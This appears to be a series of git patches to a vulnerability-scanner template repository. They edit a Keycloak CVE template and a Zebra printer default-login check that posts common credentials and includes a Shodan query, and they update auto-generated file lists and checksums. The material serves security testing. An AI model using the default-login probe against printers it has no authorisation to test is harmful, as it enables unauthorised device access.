Dhiyaneshwaran Date: Fri, 18 Oct 2024 16:46:07 +0530 Subject: [PATCH 192/218] fix-trail-space --- http/cves/2024/CVE-2024-8698.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-8698.yaml b/http/cves/2024/CVE-2024-8698.yaml index 74aa02a118..5f7aea4e03 100644 --- a/http/cves/2024/CVE-2024-8698.yaml +++ b/http/cves/2024/CVE-2024-8698.yaml @@ -36,7 +36,7 @@ info: tags: cve,cve2024,keycloak,redhat variables: - AUTH_SESSION_ID_LEGACY: "{{auth_cookie}}" # Cookie of the valid SAMLResponse message + AUTH_SESSION_ID_LEGACY: "{{auth_cookie}}" # Cookie of the valid SAMLResponse message RELAYSTATE: "{{relayState}}" # Relaystate linked to the Cookie code: From 2153bef668a604ee62d0c957d31d5913eb413683 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 18 Oct 2024 16:49:58 +0530 Subject: [PATCH 193/218] Update zebra-printer-default-login.yaml --- .../zebra/zebra-printer-default-login.yaml | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml index 6a47b55f4a..f20a881a92 100644 --- a/http/default-logins/zebra/zebra-printer-default-login.yaml +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -3,20 +3,19 @@ id: zebra-default-login info: name: Zebra - Default Login author: y0no - severity: medium + severity: high metadata: verified: true - max-request: 1 + max-request: 4 + shodan-query: title:"Zebra" tags: zebra,default-login,misconfig,printer - http: - raw: - | POST /authorize HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}} 0={{username}}&1={{password}} @@ -29,15 +28,12 @@ http: - '' - 1234 - headers: - Content-Type: application/x-www-form-urlencoded - matchers-condition: and matchers: - type: word part: body words: - - "Access Granted." + - ">Access Granted. This IP Address now" - type: status status: From 5106a0b21b729c71036adea1b1f1b0920685a348 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 18 Oct 2024 16:58:23 +0530 Subject: [PATCH 194/218] added description --- http/default-logins/zebra/zebra-printer-default-login.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml index f20a881a92..3096e55da7 100644 --- a/http/default-logins/zebra/zebra-printer-default-login.yaml +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -4,6 +4,8 @@ info: name: Zebra - Default Login author: y0no severity: high + description: + Zebra default login credentials was discovered. metadata: verified: true max-request: 4 From 3b4678898e75c65e6723861424fd501ed562ad69 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 18 Oct 2024 16:58:35 +0530 Subject: [PATCH 195/218] Update zebra-printer-default-login.yaml --- http/default-logins/zebra/zebra-printer-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/zebra/zebra-printer-default-login.yaml b/http/default-logins/zebra/zebra-printer-default-login.yaml index 3096e55da7..4257d3dd2e 100644 --- a/http/default-logins/zebra/zebra-printer-default-login.yaml +++ b/http/default-logins/zebra/zebra-printer-default-login.yaml @@ -4,7 +4,7 @@ info: name: Zebra - Default Login author: y0no severity: high - description: + description: | Zebra default login credentials was discovered. metadata: verified: true From 39bf6202b0aac747bfb02afbe80fafa072c8bca2 Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 11:34:55 +0000 Subject: [PATCH 196/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 999c6c771c..d954810a94 100644 --- a/.new-additions +++ b/.new-additions @@ -26,5 +26,6 @@ http/technologies/accellion-detect.yaml http/technologies/mirth-connect-detect.yaml http/technologies/oracle-fusion-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml +http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml passive/cves/2024/CVE-2024-40711.yaml From e07c813de0ba7df91b0da76391b89521f995dd0d Mon Sep 17 00:00:00 2001 From: ghost Date: Fri, 18 Oct 2024 11:35:06 +0000 Subject: [PATCH 197/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 419 +++++++++++++++++++++-------------------- 1 file changed, 210 insertions(+), 209 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8d243eb645..67a431e5b5 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -439,7 +439,7 @@ dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml:322e63c2fde38a3f84d349820850fc73b dast/vulnerabilities/redirect/open-redirect.yaml:2f05e6169e385b0142d95ee6918e5c0e36bc4224 dast/vulnerabilities/rfi/generic-rfi.yaml:de3d066b0dc329ffbb333def6e7f1a5a4c1d5836 dast/vulnerabilities/sqli/sqli-error-based.yaml:e4be137096c5190171b6ce4531571a828f2568ee -dast/vulnerabilities/sqli/time-based-sqli.yaml:5729816d27483f6f378f1010fd235179c14b3de0 +dast/vulnerabilities/sqli/time-based-sqli.yaml:2d69e409b7b2001dd2e93d74d57730d601e94788 dast/vulnerabilities/ssrf/blind-ssrf.yaml:27e68a58e240f97f21f3e0be91a88253d459a830 dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e39d79 dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 @@ -1022,7 +1022,7 @@ helpers/wordpress/plugins/header-footer.txt:e533118608a55d6ab1d3699c600fc5c59213 helpers/wordpress/plugins/health-check.txt:348b6913760dfd78a9394bc38c5a8fa7528208e2 helpers/wordpress/plugins/hello-dolly.txt:534467bb06aa6d8cb7e27ce2f48b87742c795cad helpers/wordpress/plugins/host-webfonts-local.txt:c11b7a364d5e6db1fe941eda928f4233e84271c9 -helpers/wordpress/plugins/hostinger.txt:c7a799ba251102d32c4623f4036bddb752445f20 +helpers/wordpress/plugins/hostinger.txt:5eb70ea432dbf15369ae7e9b68ba24eb17818ce9 helpers/wordpress/plugins/image-optimization.txt:caede917a8676edcac7e9d6481043710792411c9 helpers/wordpress/plugins/imagify.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 helpers/wordpress/plugins/imsanity.txt:6b6e01beb45fb7f89787efd83e89589ecafc6104 @@ -1038,14 +1038,14 @@ helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:4b56d2dcd702b10856068019f6df67c19347a2b5 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:76c016796ebb68b3fe6dc70daa32bc4bec2ec367 helpers/wordpress/plugins/limit-login-attempts.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/litespeed-cache.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4 +helpers/wordpress/plugins/litespeed-cache.txt:6edccbf589807e4171353b69b32d148fb22948d3 helpers/wordpress/plugins/loco-translate.txt:b8693a006e8d4b4817ba2402c67eff9e73383a45 helpers/wordpress/plugins/loginizer.txt:1ae2b3145aeda5c94e1cc83b23d74521cf9cc3c5 helpers/wordpress/plugins/loginpress.txt:5f022945150b402cb3e470acc3818847b3dc5e00 helpers/wordpress/plugins/mailchimp-for-woocommerce.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/mailchimp-for-wp.txt:5f4a5c18721bec47a3562b0c38ed156cd2e91c0b helpers/wordpress/plugins/mailpoet.txt:e935235d3647d6ff94e208a06b4173d6d3f01134 -helpers/wordpress/plugins/maintenance.txt:aa1cc400c8e8c75630f1392a15ed34d52e793a65 +helpers/wordpress/plugins/maintenance.txt:6d55d2d0c7f645f96162dda95b45196da5948091 helpers/wordpress/plugins/mainwp-child.txt:4380b93c5f9e9e252ac9ac548449d65f955603c4 helpers/wordpress/plugins/malcare-security.txt:02a714807dae3cecb51caf2ebdace744f00866c3 helpers/wordpress/plugins/megamenu.txt:f85383fcd7c211714084d7fca897998d7d759c5d @@ -1053,7 +1053,7 @@ helpers/wordpress/plugins/members.txt:abe23e8d51de58b629ca74fce30438ee71509264 helpers/wordpress/plugins/meta-box.txt:14e90d2052196043a0c73a1d5d9e01bb9b905b02 helpers/wordpress/plugins/metform.txt:27e1606dc0a2a0c2fa59fc7f5fefdaeacc0b2794 helpers/wordpress/plugins/ml-slider.txt:9197d6d1f4e061a3a22d4ee7448b0fdbbc40c347 -helpers/wordpress/plugins/newsletter.txt:7997f017232e3787b80ece3766f88ed86b1ee1ba +helpers/wordpress/plugins/newsletter.txt:cbc96cbb750c58a73b087d987081e9ef5fb22322 helpers/wordpress/plugins/nextend-facebook-connect.txt:4ddf3a1e0a6b9d9c05f57b23f658e1113368aa4f helpers/wordpress/plugins/nextgen-gallery.txt:5d3c8a2aab67c1180ad6a53d03c70a9db8542e1a helpers/wordpress/plugins/ninja-forms.txt:470958dd9db82b472bd7ca29cb314b76859d78a9 @@ -1073,7 +1073,7 @@ helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef7 helpers/wordpress/plugins/popup-maker.txt:68c9b7f7107e58a492677237912410e7d28c994b helpers/wordpress/plugins/post-smtp.txt:c7fbb82e9737192fddd7338d925d8a95c11b44ac helpers/wordpress/plugins/post-types-order.txt:c83b2e9f55420fa41efd48e4a45103566c9e4767 -helpers/wordpress/plugins/premium-addons-for-elementor.txt:e01682a590112864541b4a34a3482526a6b34801 +helpers/wordpress/plugins/premium-addons-for-elementor.txt:903f1cbc69518f297f555a9fb82981ddf540de28 helpers/wordpress/plugins/pretty-link.txt:f58e78c3747eb34e2ebd81c71131b52fedc0ddee helpers/wordpress/plugins/really-simple-captcha.txt:ce0d88c5002b6cf7664052f1fc7d652cbdadccec helpers/wordpress/plugins/really-simple-ssl.txt:ef9896bae39c1e3999a9f105466cc1f7814021a7 @@ -1114,7 +1114,7 @@ helpers/wordpress/plugins/updraftplus.txt:5a13f9241243c2d9d28367028c116b0cf92f56 helpers/wordpress/plugins/use-any-font.txt:76aa3af2b1beb37efc64c37b686676bbf23eb2bb helpers/wordpress/plugins/user-role-editor.txt:9404e7a541d10e6480bcec6f52d5fabcf1fd9c4b helpers/wordpress/plugins/velvet-blues-update-urls.txt:abe23e8d51de58b629ca74fce30438ee71509264 -helpers/wordpress/plugins/w3-total-cache.txt:cef8b08512cec8f1ab07ed0f568d56f767ca88fa +helpers/wordpress/plugins/w3-total-cache.txt:67c391fdae5d34abde64a1732ca064007569702b helpers/wordpress/plugins/webp-converter-for-media.txt:eecaf8be5654f259a19f021dd696c8aed0425326 helpers/wordpress/plugins/webp-express.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/widget-importer-exporter.txt:92dd42eb7b198ffac6578eae5bcfc969383d138c @@ -1123,7 +1123,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:775bbc46d0bc85e121db helpers/wordpress/plugins/woo-inpost.txt:3e215af9d128b75d85d37c53db93cfad88610e13 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 -helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:689951386be6307f8517f9e3be818edaa6867ce0 +helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:8d6477e08dfdf20335752a69994646f9da90741f helpers/wordpress/plugins/woocommerce-legacy-rest-api.txt:6288dca36116a23967560d315aa079e9c4f5da8c helpers/wordpress/plugins/woocommerce-payments.txt:167529724ac20fabfa5e886f9bb50f1f655f98d7 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:b92754f576ff8ab413f69638772a7d4fb01e1de4 @@ -1157,7 +1157,7 @@ helpers/wordpress/plugins/wp-super-cache.txt:4cf4800c61a8883b820676f651c058621e0 helpers/wordpress/plugins/wp-user-avatar.txt:a7bfba4c08f393aabc53a4392dbd6b3d0f13baaa helpers/wordpress/plugins/wpcf7-recaptcha.txt:c3000a6db3b2781a189fbfaa91a73e6d63d567c9 helpers/wordpress/plugins/wpcf7-redirect.txt:53944901bfcfa1a331d039912370c152f70a7110 -helpers/wordpress/plugins/wpforms-lite.txt:caa46cc0cede71b1334ad669ce79ebe5c924e30c +helpers/wordpress/plugins/wpforms-lite.txt:93f6f448401b3f9c7ac0972cec1173b727e54142 helpers/wordpress/plugins/wps-hide-login.txt:ad569827689578556775b04a9c291ff0a1a46ea7 helpers/wordpress/plugins/wpvivid-backuprestore.txt:ac58631f28651ccca6680d3be461fe5626fb3d2b helpers/wordpress/plugins/yith-woocommerce-compare.txt:fc4929308af8b80845b3c743a30013a669a02875 @@ -7841,236 +7841,236 @@ http/technologies/windows-communication-foundation-detect.yaml:b52558d968a07f23d http/technologies/wing-ftp-service-detect.yaml:92a8c8080c423ecdbe008bff39e4363d22ce995f http/technologies/wms-server-detect.yaml:5b24766a9022a18cc343b60f0381f69ce70a0b4d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:1976e542a9e41f0e082a5fa5163fd6dc51c7dc3e -http/technologies/wordpress/plugins/add-to-any.yaml:94791317f6361114b7819d96e7f9f72ed304b98c -http/technologies/wordpress/plugins/admin-menu-editor.yaml:d7fb2bc74eff546ece2922ba4bde801db6e9f62c +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:45435a0d99fd9fe22f3830ca5e77fb717f21dd6b -http/technologies/wordpress/plugins/akismet.yaml:05990a07326dd4b0c9c156f94f715acbc82c0036 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:3d9f47877f12c2c3e1e8243e41043bb3c568ba7a +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:cfdebd358c33cd35f0b0fdcae37fe30b1f61536a -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:077521a26973024357d7b7c64cd2270c3173aba4 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:eb9baf45132470c022558e474a6ab926a1377626 -http/technologies/wordpress/plugins/amp.yaml:9837999c46aa9ff4d89f84c29acd521aeca0c027 -http/technologies/wordpress/plugins/antispam-bee.yaml:f5fea9de6297a097f864763a50ac3c99c3facbef -http/technologies/wordpress/plugins/astra-sites.yaml:adb9d8dd4bd39db63de471e02aa9fb4333c718e1 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7e62ba1f8adaf5eca7e51a7fa5070279e8b30315 -http/technologies/wordpress/plugins/backwpup.yaml:13cbf32e2480c3114c5af3e4f5193b278de421fd -http/technologies/wordpress/plugins/better-search-replace.yaml:0c802f90a5bb0e06a717c36e897bc5e260121509 -http/technologies/wordpress/plugins/better-wp-security.yaml:0662aa698c95375c581a8da03f0ac5a9b0da3321 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:4bcade4222e56540dfb1c3726c02988d6b1f7e8d -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:33cb261c829479ea635464d59b9eedb4b81c22a0 -http/technologies/wordpress/plugins/breeze.yaml:1ed20fd45d53bd705682e2281e7d751b9f025bc7 -http/technologies/wordpress/plugins/broken-link-checker.yaml:b18a21e88eb26adb0fddb3fffb91dcbac2167f4c +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf http/technologies/wordpress/plugins/burst-statistics.yaml:8ae381b1138e0ed2a3121f84c7e14d33a6d6ed8a -http/technologies/wordpress/plugins/chaty.yaml:afb7f1a381f911a939300279c14474ddda5fe68e -http/technologies/wordpress/plugins/child-theme-configurator.yaml:010494319d2f2eabb558ca234c2d8c92f1b5edea -http/technologies/wordpress/plugins/classic-editor.yaml:9a6bddd9717824da3f89ae06f469a5a467e9d026 -http/technologies/wordpress/plugins/classic-widgets.yaml:8c701e1a6697236a6af5c33d540e6ef2504e69c2 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:66530f8932f8eb946e5c0120b5cea356bdc8eb19 +http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:707a544fc53a6d16bf19072e1d4e597beeebc4bd -http/technologies/wordpress/plugins/coblocks.yaml:bbf2254bb35ddbd0e195de149fc83929d70d2dd2 -http/technologies/wordpress/plugins/code-snippets.yaml:3baadcc309b9d626454bca269483b8d98a42fb3d -http/technologies/wordpress/plugins/coming-soon.yaml:02f3bd3e9e365ab3aaabff01cd28e8d6c3a48c67 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:6549c9482d8f414ba60bf4b281b70fc2441a433d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:1ee215f48352bac5651574b4f2d02d8b95b635a8 -http/technologies/wordpress/plugins/contact-form-7.yaml:aa7af42e721a59e04f16af14c8e9765f2a03b838 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:2f2c27d414a0c7a2ff6589a1a9c24fcd3e8f0935 -http/technologies/wordpress/plugins/cookie-law-info.yaml:196e9c44ca934fc4c1f885318a84c5b34bfb9408 -http/technologies/wordpress/plugins/cookie-notice.yaml:66c2286b38d1c06916a6577ee8bf21741c94dcf6 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:1ed2dce002b43628a9beaff63f799a5bbac9af14 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:637ad468e2b1f602d4ac8d8684a02d9db4d579d6 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d8a893f9695af7d4252fda00f8de766676e99797 -http/technologies/wordpress/plugins/custom-css-js.yaml:965fdd1dd61f58520b54dd5d5819eadaa973da06 -http/technologies/wordpress/plugins/custom-fonts.yaml:51e9a8c5e773acaaac062d3ec07de7d4668dd067 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:747eeab480130708b7b76c2bd1ce52579aa7c9f4 -http/technologies/wordpress/plugins/disable-comments.yaml:9f6779484633a739c1a34d25e933ac67276ca47a -http/technologies/wordpress/plugins/disable-gutenberg.yaml:eee45c9f4ab2d9308d07276a1157fef4543a77ff -http/technologies/wordpress/plugins/duplicate-page.yaml:4372962a2796b059b6c3a2697d40c15100d4d07f -http/technologies/wordpress/plugins/duplicate-post.yaml:be523de22923128b0f4d167106e32965f560bed2 -http/technologies/wordpress/plugins/duplicator.yaml:61bb48d05060f9e76f4ab6ea7e89e881ef417257 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:e26f5fcf9df21741d6c4d9c775cf5457e5839be9 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:02b01785c66dee2c06b91fd257f5ea08b8d557c6 +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:85ed4754232635fa21a85b407d4cff31d35387c9 +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:2e8ae9cb3babce12115d710e00ce58acc13e3ee2 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:ce6ed3aca6ed79ee0bbb78541294a0afd7484c13 -http/technologies/wordpress/plugins/elementor.yaml:d189910f53171d9197d53b6f72629880148cea89 -http/technologies/wordpress/plugins/elementskit-lite.yaml:1389b7c8ff234410a39812c87c2b8bd5e5c894a6 -http/technologies/wordpress/plugins/enable-media-replace.yaml:f03ee237e750bdffc574d3d15629625fb6b490d1 -http/technologies/wordpress/plugins/envato-elements.yaml:32f87a32ccc0f1163cab2f7f18bb9304431d407a -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:b1cfdbe9b08d70144609cbd36d6cd99aa6a9cea8 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:03b6caa25ea07cb0d9b799d4e58c7e14bb6e2af4 -http/technologies/wordpress/plugins/extendify.yaml:402285e0bbd8d6b303500806b54a422dd6fcb94c -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:246bec694ac0ea0f730e0723c59108ec5a835537 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:92ec1f76e8999dfbef4bd1577df62f722fe42a4a +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:78b3c78912cbdc4c8349bef72fd8fd6fa24beb21 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:022f518e7d49f749cbf45a0e81c4bcdc60f7e758 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/extendify.yaml:16df61d6c1c08c47ee240cf33df07fd008bc0a27 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:55febd7249bb43dd05cf5bcc2c096b11ed2dd2f9 -http/technologies/wordpress/plugins/flamingo.yaml:c6b6c878b7f2b685c460040d6d5aa1e87a76e7f1 -http/technologies/wordpress/plugins/fluent-smtp.yaml:34d414379694a4f2b1e0486a4933c6966c57cb5b -http/technologies/wordpress/plugins/fluentform.yaml:2f08ba3db943c08bd744932a290eec38aef5f3fd -http/technologies/wordpress/plugins/font-awesome.yaml:8ac46f6e053bea5592efccd2b542613b7f325b8e -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:19fc997bdd4ff27085db0ca47f83f4e828d56375 -http/technologies/wordpress/plugins/formidable.yaml:c13a61770b1d6c266be89e08f6554c40706c7f79 -http/technologies/wordpress/plugins/forminator.yaml:453ba2b8b71f342c0f2c336aa0373a957aef92b8 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:39c530d561b9bf6e4faa2d63319f9d697cdc5650 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:94c19fbaced80d7171a77b228a2355a8f4b23178 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluent-smtp.yaml:f8756f30bfdc614abb6aa0cef6f395e5a96615d8 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:782875011c940e8bfc6f8adae8fa40d0387f6fd8 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b http/technologies/wordpress/plugins/give.yaml:fc2d82b805174c1b02d60efd47f286cc8d3aceb5 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:fb285e91ec035cf01097705bd96c5ae95832d7e2 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:382d905766796f2517c9acd89e9e14f9283f0234 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:e4767f67155236ce903ed429381c3ac6fb5a4f08 -http/technologies/wordpress/plugins/google-site-kit.yaml:b345f71366a8e5f4c658087ff7a2458d4bb7e09a 